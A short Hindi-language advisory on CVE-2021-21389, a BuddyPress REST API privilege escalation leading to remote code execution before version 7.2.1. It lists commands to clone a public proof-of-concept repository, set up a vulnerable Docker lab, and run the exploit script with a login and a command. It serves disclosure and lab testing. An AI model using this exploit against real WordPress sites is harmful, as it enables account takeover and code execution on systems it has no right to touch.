
BuddyPress एक ओपन सोर्स WordPress प्लगइन है जो सामुदायिक साइट बनाने के लिए है। BuddyPress के 5.0.0 से 7.2.1 से पहले के रिलीज़ में, एक गैर-विशेषाधिकार प्राप्त, नियमित उपयोगकर्ता के लिए REST API सदस्यों के समापन बिंदु में एक मुद्दे का शोषण करके व्यवस्थापक अधिकार प्राप्त करना संभव है। भेद्यता BuddyPress 7.2.1 में ठीक कर दी गई है। प्लगइन की मौजूदा स्थापनाओं को इस मुद्दे को कम करने के लिए इस संस्करण में अपडेट किया जाना चाहिए।
BuddyPress < 7.2.1 - REST API विशेषाधिकार वृद्धि से RCE
PoC (पूर्ण)
प्रभावित संस्करण: 5.0.0 से 7.2.0
उपयोगकर्ता आवश्यकता: सब्सक्राइबर उपयोगकर्ता
विधि: व्यवस्थापक के लिए विशेषाधिकार वृद्धि और REST API के माध्यम से RCE ट्रिगर करना
समाप्ति बिंदु: /v1/members/me समाप्ति बिंदु।
git clone https://github.com/HoangKien1020/CVE-2021-21389
cd CVE-2021-21389/
docker build . -t hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Other way to pull this docker instead of building:
docker pull hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Access your host/IP
Ex: http://test.local:8080
python3 CVE-2021-21389.py http://test.local:8080 test 1234 whoami
उदाहरण:

https://buddypress.org/2021/03/buddypress-7-2-1-security-release/